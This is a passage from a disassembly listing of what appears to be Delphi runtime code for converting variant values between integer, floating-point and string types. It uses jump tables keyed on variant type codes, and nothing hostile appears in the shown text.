add esp, 0FFFFFFF8h
fistp qword ptr [esp]
wait
mov eax, esi
call sub_4001267C
jmp loc_4000EBF2
; ---------------------------------------------------------------------------
loc_4000EB14: ; CODE XREF: sub_4000E9CC+3E�j
; DATA XREF: sub_4000E9CC:off_4000EA11�o
mov eax, ebx ; jumptable 4000EA0A case 7
call sub_40010ABC
add esp, 0FFFFFFF8h
fstp qword ptr [esp]
wait
mov eax, esi
call sub_400126A8
jmp loc_4000EBF2
; ---------------------------------------------------------------------------
loc_4000EB2E: ; CODE XREF: sub_4000E9CC+3E�j
; DATA XREF: sub_4000E9CC:off_4000EA11�o
mov edx, ebx ; jumptable 4000EA0A case 8
mov eax, esi
call sub_4000E7B0
jmp loc_4000EBF2
; ---------------------------------------------------------------------------
loc_4000EB3C: ; CODE XREF: sub_4000E9CC+3E�j
; DATA XREF: sub_4000E9CC:off_4000EA11�o
mov eax, ebx ; jumptable 4000EA0A case 11
call sub_4000FE58
mov edx, eax
mov eax, esi
call sub_400126D4
jmp loc_4000EBF2
; ---------------------------------------------------------------------------
loc_4000EB51: ; CODE XREF: sub_4000E9CC+3E�j
; DATA XREF: sub_4000E9CC:off_4000EA11�o
mov eax, ebx ; jumptable 4000EA0A case 16
call sub_4000F1E0
mov edx, eax
mov eax, esi
call sub_400125C0
jmp loc_4000EBF2
; ---------------------------------------------------------------------------
loc_4000EB66: ; CODE XREF: sub_4000E9CC+3E�j
; DATA XREF: sub_4000E9CC:off_4000EA11�o
mov eax, ebx ; jumptable 4000EA0A case 17
call sub_4000F294
mov edx, eax
mov eax, esi
call sub_40012560
jmp short loc_4000EBF2
; ---------------------------------------------------------------------------
loc_4000EB78: ; CODE XREF: sub_4000E9CC+3E�j
; DATA XREF: sub_4000E9CC:off_4000EA11�o
mov eax, ebx ; jumptable 4000EA0A case 18
call sub_4000F434
mov edx, eax
mov eax, esi
call sub_40012580
jmp short loc_4000EBF2
; ---------------------------------------------------------------------------
loc_4000EB8A: ; CODE XREF: sub_4000E9CC+3E�j
; DATA XREF: sub_4000E9CC:off_4000EA11�o
mov eax, ebx ; jumptable 4000EA0A case 19
call sub_4000F510
mov edx, eax
mov eax, esi
call sub_400125A0
jmp short loc_4000EBF2
; ---------------------------------------------------------------------------
loc_4000EB9C: ; CODE XREF: sub_4000E9CC+3E�j
; DATA XREF: sub_4000E9CC:off_4000EA11�o
mov eax, ebx ; jumptable 4000EA0A case 20
call sub_4000F860
push edx
push eax
mov eax, esi
call sub_40012600
jmp short loc_4000EBF2
; ---------------------------------------------------------------------------
loc_4000EBAE: ; CODE XREF: sub_4000E9CC+3E�j
; DATA XREF: sub_4000E9CC:off_4000EA11�o
mov edx, ebx ; jumptable 4000EA0A case 9
mov eax, esi
call sub_4000E848
jmp short loc_4000EBF2
; ---------------------------------------------------------------------------
loc_4000EBB9: ; CODE XREF: sub_4000E9CC+3E�j
; DATA XREF: sub_4000E9CC:off_4000EA11�o
mov edx, ebx ; jumptable 4000EA0A case 13
mov eax, esi
call sub_4000E894
jmp short loc_4000EBF2
; ---------------------------------------------------------------------------
loc_4000EBC4: ; CODE XREF: sub_4000E9CC+38�j
; sub_4000E9CC+3E�j
; DATA XREF: ...
mov edx, ecx ; default
; jumptable 4000EA0A cases 10,12,14,15
sub edx, 100h
jz short loc_4000EBD3
dec edx
jz short loc_4000EBDE
jmp short loc_4000EBE9
; ---------------------------------------------------------------------------
loc_4000EBD3: ; CODE XREF: sub_4000E9CC+200�j
mov edx, ebx
mov eax, esi
call sub_4000E7FC
jmp short loc_4000EBF2
; ---------------------------------------------------------------------------
loc_4000EBDE: ; CODE XREF: sub_4000E9CC+203�j
mov dx, 101h
call sub_4000DBF4
jmp short loc_4000EBF2
; ---------------------------------------------------------------------------
loc_4000EBE9: ; CODE XREF: sub_4000E9CC+205�j
mov edx, ebx
mov eax, esi
call sub_4000E960
loc_4000EBF2: ; CODE XREF: sub_4000E9CC+2E�j
; sub_4000E9CC+B3�j ...
pop esi
pop ebx
retn
sub_4000E9CC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000EBF8 proc near ; CODE XREF: sub_4000ED90+15B�p
; sub_4000ED90+213�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0
push 0
push 0
push ebx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_4000EC9B
push dword ptr fs:[eax]
mov fs:[eax], esp
mov edx, ebx
lea eax, [ebp+var_4]
call sub_40011DFC
lea eax, [ebp+var_8]
push eax
push 0
push 400h
mov eax, [ebp+var_4]
push eax
mov eax, off_4001B0B0
mov eax, [eax]
call eax
mov edx, eax
sub edx, 80020005h
jz short loc_4000EC48
sub edx, 7FFDFFFBh
jnz short loc_4000EC71
jmp short loc_4000EC7D
; ---------------------------------------------------------------------------
loc_4000EC48: ; CODE XREF: sub_4000EBF8+44�j
lea eax, [ebp+var_C]
mov edx, [ebp+var_4]
call sub_40004B0C
mov eax, [ebp+var_C]
lea edx, [ebp+var_8]
call sub_40007DEC
test al, al
jnz short loc_4000EC7D
mov eax, ebx
call sub_4000FE58
and eax, 7Fh
mov [ebp+var_8], eax
jmp short loc_4000EC7D
; ---------------------------------------------------------------------------
loc_4000EC71: ; CODE XREF: sub_4000EBF8+4C�j
movzx edx, word ptr [ebx]
mov cx, 3
call sub_4000E034
loc_4000EC7D: ; CODE XREF: sub_4000EBF8+4E�j
; sub_4000EBF8+68�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000ECA2
loc_4000EC8A: ; CODE XREF: sub_4000EBF8+A8�j
lea eax, [ebp+var_C]
call sub_40004884
lea eax, [ebp+var_4]
call sub_40005008
retn
; ---------------------------------------------------------------------------
loc_4000EC9B: ; DATA XREF: sub_4000EBF8+F�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000EC8A
; ---------------------------------------------------------------------------
loc_4000ECA2: ; CODE XREF: sub_4000EBF8+A2�j
; DATA XREF: sub_4000EBF8+8D�o
mov eax, [ebp+var_8]
pop ebx
mov esp, ebp
pop ebp
retn
sub_4000EBF8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000ECAC proc near ; CODE XREF: sub_4000ED90+1F0�p
; sub_4000ED90+3F3�p ...
var_14 = byte ptr -14h
var_C = dword ptr -0Ch
push ebx
add esp, 0FFFFFFF0h
mov ebx, eax
push esp
call sub_4000CDD8
push 3
push 0
push 400h
push ebx
lea eax, [esp+24h+var_14]
push eax
mov eax, off_4001B064
mov eax, [eax]
call eax
movzx edx, word ptr [ebx]
mov cx, 3
call sub_4000E034
mov eax, [esp+14h+var_C]
add esp, 10h
pop ebx
retn
sub_4000ECAC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000ECE8 proc near ; CODE XREF: sub_4000ED90+223�p
var_14 = byte ptr -14h
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
push ebx
mov ebx, eax
lea eax, [ebp+var_14]
push eax
call sub_4000CDD8
xor eax, eax
push ebp
push offset loc_4000ED3C
push dword ptr fs:[eax]
mov fs:[eax], esp
mov edx, ebx
lea eax, [ebp+var_14]
call sub_4000E700
lea eax, [ebp+var_14]
call ds:off_4001F29C
lea eax, [ebp+var_14]
call sub_4000ED90
mov [ebp+var_4], eax
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000ED43
loc_4000ED33: ; CODE XREF: sub_4000ECE8+59�j
lea eax, [ebp+var_14]
call sub_4000E3D8
retn
; ---------------------------------------------------------------------------
loc_4000ED3C: ; DATA XREF: sub_4000ECE8+15�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000ED33
; ---------------------------------------------------------------------------
loc_4000ED43: ; CODE XREF: sub_4000ECE8+53�j
; DATA XREF: sub_4000ECE8+46�o
mov eax, [ebp+var_4]
pop ebx
mov esp, ebp
pop ebp
retn
sub_4000ECE8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000ED4C proc near ; CODE XREF: sub_4000ED90+403�p
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
push ebx
push esi
push edi
add esp, 0FFFFFFECh
mov edi, edx
mov esi, eax
mov edx, esp
movzx eax, word ptr [esi]
call sub_40012D98
mov ebx, eax
test bl, bl
jz short loc_4000ED87
lea eax, [esp+20h+var_1C]
push eax
call sub_4000CDD8
push 3
mov ecx, esi
lea edx, [esp+24h+var_1C]
mov eax, [esp+24h+var_20]
mov esi, [eax]
call dword ptr [esi+1Ch]
mov eax, [esp+20h+var_14]
mov [edi], eax
loc_4000ED87: ; CODE XREF: sub_4000ED4C+18�j
mov eax, ebx
add esp, 14h
pop edi
pop esi
pop ebx
retn
sub_4000ED4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000ED90 proc near ; CODE XREF: sub_4000E9CC+E7�p
; sub_4000ECE8+36�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov [ebp+var_4], eax
xor edx, edx
push ebp
push offset loc_4000F1B1
push dword ptr fs:[edx]
mov fs:[edx], esp
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
movzx edx, ax
cmp edx, 14h ; switch 21 cases
ja loc_4000EF8D ; default
; jumptable 4000EDBC cases 10,14,15
jmp ds:off_4000EDC3[edx*4] ; switch jump
; ---------------------------------------------------------------------------
off_4000EDC3 dd offset loc_4000EE17 ; DATA XREF: sub_4000ED90+2C�r
dd offset loc_4000EE21 ; jump table for switch statement
dd offset loc_4000EE41
dd offset loc_4000EE50
dd offset loc_4000EE5E
dd offset loc_4000EE7F
dd offset loc_4000EEA0
dd offset loc_4000EEC7
dd offset loc_4000EEE8
dd offset loc_4000EF7D
dd offset loc_4000EF8D
dd offset loc_4000EEF8
dd offset loc_4000EF6A
dd offset loc_4000EF7D
dd offset loc_4000EF8D
dd offset loc_4000EF8D
dd offset loc_4000EF07
dd offset loc_4000EF16
dd offset loc_4000EF25
dd offset loc_4000EF34
dd offset loc_4000EF4B
; ---------------------------------------------------------------------------
loc_4000EE17: ; CODE XREF: sub_4000ED90+2C�j
; DATA XREF: sub_4000ED90:off_4000EDC3�o
xor eax, eax ; jumptable 4000EDBC case 0
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000EE21: ; CODE XREF: sub_4000ED90+2C�j
; DATA XREF: sub_4000ED90:off_4000EDC3�o
cmp byte_4001AA10, 0 ; jumptable 4000EDBC case 1
jz short loc_4000EE37
mov dx, 3
mov ax, 1
call sub_4000DBF4
loc_4000EE37: ; CODE XREF: sub_4000ED90+98�j
xor eax, eax
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000EE41: ; CODE XREF: sub_4000ED90+2C�j
; DATA XREF: sub_4000ED90:off_4000EDC3�o
mov eax, [ebp+var_4] ; jumptable 4000EDBC case 2
movsx eax, word ptr [eax+8]
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000EE50: ; CODE XREF: sub_4000ED90+2C�j
; DATA XREF: sub_4000ED90:off_4000EDC3�o
mov eax, [ebp+var_4] ; jumptable 4000EDBC case 3
mov eax, [eax+8]
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000EE5E: ; CODE XREF: sub_4000ED90+2C�j
; DATA XREF: sub_4000ED90:off_4000EDC3�o
mov eax, [ebp+var_4] ; jumptable 4000EDBC case 4
fld dword ptr [eax+8]
call sub_400030A8
push eax
sar eax, 1Fh
cmp eax, edx
pop eax
jz short loc_4000EE77
call sub_40003C64
; ---------------------------------------------------------------------------
loc_4000EE77: ; CODE XREF: sub_4000ED90+E0�j
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000EE7F: ; CODE XREF: sub_4000ED90+2C�j
; DATA XREF: sub_4000ED90:off_4000EDC3�o
mov eax, [ebp+var_4] ; jumptable 4000EDBC case 5
fld qword ptr [eax+8]
call sub_400030A8
push eax
sar eax, 1Fh
cmp eax, edx
pop eax
jz short loc_4000EE98
call sub_40003C64
; ---------------------------------------------------------------------------
loc_4000EE98: ; CODE XREF: sub_4000ED90+101�j
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000EEA0: ; CODE XREF: sub_4000ED90+2C�j
; DATA XREF: sub_4000ED90:off_4000EDC3�o
mov eax, [ebp+var_4] ; jumptable 4000EDBC case 6
fild qword ptr [eax+8]
fdiv ds:flt_4000F1DC
call sub_400030A8
push eax
sar eax, 1Fh
cmp eax, edx
pop eax
jz short loc_4000EEBF
call sub_40003C64
; ---------------------------------------------------------------------------
loc_4000EEBF: ; CODE XREF: sub_4000ED90+128�j
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000EEC7: ; CODE XREF: sub_4000ED90+2C�j
; DATA XREF: sub_4000ED90:off_4000EDC3�o
mov eax, [ebp+var_4] ; jumptable 4000EDBC case 7
fld qword ptr [eax+8]
call sub_400030A8
push eax
sar eax, 1Fh
cmp eax, edx
pop eax
jz short loc_4000EEE0
call sub_40003C64
; ---------------------------------------------------------------------------
loc_4000EEE0: ; CODE XREF: sub_4000ED90+149�j
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000EEE8: ; CODE XREF: sub_4000ED90+2C�j
; DATA XREF: sub_4000ED90:off_4000EDC3�o
mov eax, [ebp+var_4] ; jumptable 4000EDBC case 8
call sub_4000EBF8
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000EEF8: ; CODE XREF: sub_4000ED90+2C�j
; DATA XREF: sub_4000ED90:off_4000EDC3�o
mov eax, [ebp+var_4] ; jumptable 4000EDBC case 11
movsx eax, word ptr [eax+8]
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000EF07: ; CODE XREF: sub_4000ED90+2C�j
; DATA XREF: sub_4000ED90:off_4000EDC3�o
mov eax, [ebp+var_4] ; jumptable 4000EDBC case 16
movsx eax, byte ptr [eax+8]
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000EF16: ; CODE XREF: sub_4000ED90+2C�j
; DATA XREF: sub_4000ED90:off_4000EDC3�o
mov eax, [ebp+var_4] ; jumptable 4000EDBC case 17
movzx eax, byte ptr [eax+8]
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000EF25: ; CODE XREF: sub_4000ED90+2C�j
; DATA XREF: sub_4000ED90:off_4000EDC3�o
mov eax, [ebp+var_4] ; jumptable 4000EDBC case 18
movzx eax, word ptr [eax+8]
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000EF34: ; CODE XREF: sub_4000ED90+2C�j
; DATA XREF: sub_4000ED90:off_4000EDC3�o
mov eax, [ebp+var_4] ; jumptable 4000EDBC case 19
mov eax, [eax+8]
test eax, eax
jns short loc_4000EF43
call sub_40003C64
; ---------------------------------------------------------------------------
loc_4000EF43: ; CODE XREF: sub_4000ED90+1AC�j
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000EF4B: ; CODE XREF: sub_4000ED90+2C�j
; DATA XREF: sub_4000ED90:off_4000EDC3�o
mov eax, [ebp+var_4] ; jumptable 4000EDBC case 20
mov edx, [eax+0Ch]
mov eax, [eax+8]
push eax
sar eax, 1Fh
cmp eax, edx
pop eax
jz short loc_4000EF62
call sub_40003C64
; ---------------------------------------------------------------------------
loc_4000EF62: ; CODE XREF: sub_4000ED90+1CB�j
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000EF6A: ; CODE XREF: sub_4000ED90+2C�j
; DATA XREF: sub_4000ED90:off_4000EDC3�o
mov eax, [ebp+var_4] ; jumptable 4000EDBC case 12
mov eax, [eax+8]
call sub_4000ED90
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000EF7D: ; CODE XREF: sub_4000ED90+2C�j
; DATA XREF: sub_4000ED90:off_4000EDC3�o
mov eax, [ebp+var_4] ; jumptable 4000EDBC cases 9,13
call sub_4000ECAC
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000EF8D: ; CODE XREF: sub_4000ED90+26�j
; sub_4000ED90+2C�j
; DATA XREF: ...
mov edx, [ebp+var_4] ; default
; jumptable 4000EDBC cases 10,14,15
mov edx, eax
sub dx, 100h
jz short loc_4000EFA0
dec dx
jz short loc_4000EFB0
jmp short loc_4000EFC0
; ---------------------------------------------------------------------------
loc_4000EFA0: ; CODE XREF: sub_4000ED90+207�j
mov eax, [ebp+var_4]
call sub_4000EBF8
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000EFB0: ; CODE XREF: sub_4000ED90+20C�j
mov eax, [ebp+var_4]
call sub_4000ECE8
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000EFC0: ; CODE XREF: sub_4000ED90+20E�j
mov edx, [ebp+var_4]
test ah, 40h
jz loc_4000F18D
mov edx, [ebp+var_4]
movzx eax, ax
and eax, 0FFFFBFFFh
cmp eax, 14h ; switch 21 cases
ja loc_4000F180 ; default
; jumptable 4000EFE0 cases 0,1,9,10,13-15
jmp ds:off_4000EFE7[eax*4] ; switch jump
; ---------------------------------------------------------------------------
off_4000EFE7 dd offset loc_4000F180 ; DATA XREF: sub_4000ED90+250�r
dd offset loc_4000F180 ; jump table for switch statement
dd offset loc_4000F03B
dd offset loc_4000F04C
dd offset loc_4000F05C
dd offset loc_4000F07F
dd offset loc_4000F0A2
dd offset loc_4000F0CB
dd offset loc_4000F0EE
dd offset loc_4000F180
dd offset loc_4000F180
dd offset loc_4000F0FE
dd offset loc_4000F170
dd offset loc_4000F180
dd offset loc_4000F180
dd offset loc_4000F180
dd offset loc_4000F10F
dd offset loc_4000F120
dd offset loc_4000F12E
dd offset loc_4000F13C
dd offset loc_4000F152
; ---------------------------------------------------------------------------
loc_4000F03B: ; CODE XREF: sub_4000ED90+250�j
; DATA XREF: sub_4000ED90:off_4000EFE7�o
mov eax, [ebp+var_4] ; jumptable 4000EFE0 case 2
mov eax, [eax+8]
movsx eax, word ptr [eax]
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000F04C: ; CODE XREF: sub_4000ED90+250�j
; DATA XREF: sub_4000ED90:off_4000EFE7�o
mov eax, [ebp+var_4] ; jumptable 4000EFE0 case 3
mov eax, [eax+8]
mov eax, [eax]
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000F05C: ; CODE XREF: sub_4000ED90+250�j
; DATA XREF: sub_4000ED90:off_4000EFE7�o
mov eax, [ebp+var_4] ; jumptable 4000EFE0 case 4
mov eax, [eax+8]
fld dword ptr [eax]
call sub_400030A8
push eax
sar eax, 1Fh
cmp eax, edx
pop eax
jz short loc_4000F077
call sub_40003C64
; ---------------------------------------------------------------------------
loc_4000F077: ; CODE XREF: sub_4000ED90+2E0�j
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000F07F: ; CODE XREF: sub_4000ED90+250�j
; DATA XREF: sub_4000ED90:off_4000EFE7�o
mov eax, [ebp+var_4] ; jumptable 4000EFE0 case 5
mov eax, [eax+8]
fld qword ptr [eax]
call sub_400030A8
push eax
sar eax, 1Fh
cmp eax, edx
pop eax
jz short loc_4000F09A
call sub_40003C64
; ---------------------------------------------------------------------------
loc_4000F09A: ; CODE XREF: sub_4000ED90+303�j
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000F0A2: ; CODE XREF: sub_4000ED90+250�j
; DATA XREF: sub_4000ED90:off_4000EFE7�o
mov eax, [ebp+var_4] ; jumptable 4000EFE0 case 6
mov eax, [eax+8]
fild qword ptr [eax]
fdiv ds:flt_4000F1DC
call sub_400030A8
push eax
sar eax, 1Fh
cmp eax, edx
pop eax
jz short loc_4000F0C3
call sub_40003C64
; ---------------------------------------------------------------------------
loc_4000F0C3: ; CODE XREF: sub_4000ED90+32C�j
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000F0CB: ; CODE XREF: sub_4000ED90+250�j
; DATA XREF: sub_4000ED90:off_4000EFE7�o
mov eax, [ebp+var_4] ; jumptable 4000EFE0 case 7
mov eax, [eax+8]
fld qword ptr [eax]
call sub_400030A8
push eax
sar eax, 1Fh
cmp eax, edx
pop eax
jz short loc_4000F0E6
call sub_40003C64
; ---------------------------------------------------------------------------
loc_4000F0E6: ; CODE XREF: sub_4000ED90+34F�j
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000F0EE: ; CODE XREF: sub_4000ED90+250�j
; DATA XREF: sub_4000ED90:off_4000EFE7�o
mov eax, [ebp+var_4] ; jumptable 4000EFE0 case 8
call sub_4000EBF8
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000F0FE: ; CODE XREF: sub_4000ED90+250�j
; DATA XREF: sub_4000ED90:off_4000EFE7�o
mov eax, [ebp+var_4] ; jumptable 4000EFE0 case 11
mov eax, [eax+8]
movsx eax, word ptr [eax]
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000F10F: ; CODE XREF: sub_4000ED90+250�j
; DATA XREF: sub_4000ED90:off_4000EFE7�o
mov eax, [ebp+var_4] ; jumptable 4000EFE0 case 16
mov eax, [eax+8]
movsx eax, byte ptr [eax]
mov [ebp+var_8], eax
jmp loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000F120: ; CODE XREF: sub_4000ED90+250�j
; DATA XREF: sub_4000ED90:off_4000EFE7�o
mov eax, [ebp+var_4] ; jumptable 4000EFE0 case 17
mov eax, [eax+8]
movzx eax, byte ptr [eax]
mov [ebp+var_8], eax
jmp short loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000F12E: ; CODE XREF: sub_4000ED90+250�j
; DATA XREF: sub_4000ED90:off_4000EFE7�o
mov eax, [ebp+var_4] ; jumptable 4000EFE0 case 18
mov eax, [eax+8]
movzx eax, word ptr [eax]
mov [ebp+var_8], eax
jmp short loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000F13C: ; CODE XREF: sub_4000ED90+250�j
; DATA XREF: sub_4000ED90:off_4000EFE7�o
mov eax, [ebp+var_4] ; jumptable 4000EFE0 case 19
mov eax, [eax+8]
mov eax, [eax]
test eax, eax
jns short loc_4000F14D
call sub_40003C64
; ---------------------------------------------------------------------------
loc_4000F14D: ; CODE XREF: sub_4000ED90+3B6�j
mov [ebp+var_8], eax
jmp short loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000F152: ; CODE XREF: sub_4000ED90+250�j
; DATA XREF: sub_4000ED90:off_4000EFE7�o
mov eax, [ebp+var_4] ; jumptable 4000EFE0 case 20
mov eax, [eax+8]
mov edx, [eax+4]
mov eax, [eax]
push eax
sar eax, 1Fh
cmp eax, edx
pop eax
jz short loc_4000F16B
call sub_40003C64
; ---------------------------------------------------------------------------
loc_4000F16B: ; CODE XREF: sub_4000ED90+3D4�j
mov [ebp+var_8], eax
jmp short loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000F170: ; CODE XREF: sub_4000ED90+250�j
; DATA XREF: sub_4000ED90:off_4000EFE7�o
mov eax, [ebp+var_4] ; jumptable 4000EFE0 case 12
mov eax, [eax+8]
call sub_4000ED90
mov [ebp+var_8], eax
jmp short loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000F180: ; CODE XREF: sub_4000ED90+24A�j
; sub_4000ED90+250�j
; DATA XREF: ...
mov eax, [ebp+var_4] ; default
; jumptable 4000EFE0 cases 0,1,9,10,13-15
call sub_4000ECAC
mov [ebp+var_8], eax
jmp short loc_4000F1A7
; ---------------------------------------------------------------------------
loc_4000F18D: ; CODE XREF: sub_4000ED90+236�j
lea edx, [ebp+var_8]
mov eax, [ebp+var_4]
call sub_4000ED4C
test al, al
jnz short loc_4000F1A7
mov eax, [ebp+var_4]
call sub_4000ECAC
mov [ebp+var_8], eax
loc_4000F1A7: ; CODE XREF: sub_4000ED90+8C�j
; sub_4000ED90+AC�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_4000F1CF
; ---------------------------------------------------------------------------
loc_4000F1B1: ; DATA XREF: sub_4000ED90+F�o
jmp sub_400040D8
; ---------------------------------------------------------------------------
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
mov dx, 3
call sub_4000E068
xor eax, eax
mov [ebp+var_8], eax
call sub_40004360
loc_4000F1CF: ; CODE XREF: sub_4000ED90+41F�j
mov eax, [ebp+var_8]
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_4000ED90 endp
; ---------------------------------------------------------------------------
align 4
flt_4000F1DC dd 1.0e4 ; DATA XREF: sub_4000ED90+116�r
; sub_4000ED90+31A�r
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000F1E0 proc near ; CODE XREF: sub_4000E9CC+187�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
sub ax, 1
jb short loc_4000F206
jz short loc_4000F20A
sub ax, 0Ah
jz short loc_4000F224
sub ax, 5
jz short loc_4000F22D
jmp short loc_4000F236
; ---------------------------------------------------------------------------
loc_4000F206: ; CODE XREF: sub_4000F1E0+14�j
xor ebx, ebx
jmp short loc_4000F289
; ---------------------------------------------------------------------------
loc_4000F20A: ; CODE XREF: sub_4000F1E0+16�j
cmp byte_4001AA10, 0
jz short loc_4000F220
mov dx, 10h
mov ax, 1
call sub_4000DBF4
loc_4000F220: ; CODE XREF: sub_4000F1E0+31�j
xor ebx, ebx
jmp short loc_4000F289
; ---------------------------------------------------------------------------
loc_4000F224: ; CODE XREF: sub_4000F1E0+1C�j
mov ebx, [ebp+var_4]
movzx ebx, byte ptr [ebx+8]
jmp short loc_4000F289
; ---------------------------------------------------------------------------
loc_4000F22D: ; CODE XREF: sub_4000F1E0+22�j
mov ebx, [ebp+var_4]
movzx ebx, byte ptr [ebx+8]
jmp short loc_4000F289
; ---------------------------------------------------------------------------
loc_4000F236: ; CODE XREF: sub_4000F1E0+24�j
xor eax, eax
push ebp
push offset loc_4000F26E
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
call sub_4000ED90
mov ebx, eax
add ebx, 80h
cmp ebx, 0FFh
jbe short loc_4000F261
call sub_40003C64
; ---------------------------------------------------------------------------
loc_4000F261: ; CODE XREF: sub_4000F1E0+7A�j
add ebx, 0FFFFFF80h
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_4000F289
; ---------------------------------------------------------------------------
loc_4000F26E: ; DATA XREF: sub_4000F1E0+59�o
jmp sub_400040D8
; ---------------------------------------------------------------------------
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
mov dx, 10h
call sub_4000E068
xor ebx, ebx
call sub_40004360
loc_4000F289: ; CODE XREF: sub_4000F1E0+28�j
; sub_4000F1E0+42�j ...
mov eax, ebx
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn
sub_4000F1E0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000F294 proc near ; CODE XREF: sub_4000E9CC+19C�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
sub ax, 1
jb short loc_4000F2BA
jz short loc_4000F2BE
sub ax, 0Ah
jz short loc_4000F2D8
sub ax, 6
jz short loc_4000F2E1
jmp short loc_4000F2EA
; ---------------------------------------------------------------------------
loc_4000F2BA: ; CODE XREF: sub_4000F294+14�j
xor ebx, ebx
jmp short loc_4000F334
; ---------------------------------------------------------------------------
loc_4000F2BE: ; CODE XREF: sub_4000F294+16�j
cmp byte_4001AA10, 0
jz short loc_4000F2D4
mov dx, 11h
mov ax, 1
call sub_4000DBF4
loc_4000F2D4: ; CODE XREF: sub_4000F294+31�j
xor ebx, ebx
jmp short loc_4000F334
; ---------------------------------------------------------------------------
loc_4000F2D8: ; CODE XREF: sub_4000F294+1C�j
mov ebx, [ebp+var_4]
movzx ebx, byte ptr [ebx+8]
jmp short loc_4000F334
; ---------------------------------------------------------------------------
loc_4000F2E1: ; CODE XREF: sub_4000F294+22�j
mov ebx, [ebp+var_4]
movzx ebx, byte ptr [ebx+8]
jmp short loc_4000F334
; ---------------------------------------------------------------------------
loc_4000F2EA: ; CODE XREF: sub_4000F294+24�j
xor eax, eax
push ebp
push offset loc_4000F319
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
call sub_4000ED90
mov ebx, eax
cmp ebx, 0FFh
jbe short loc_4000F30F
call sub_40003C64
; ---------------------------------------------------------------------------
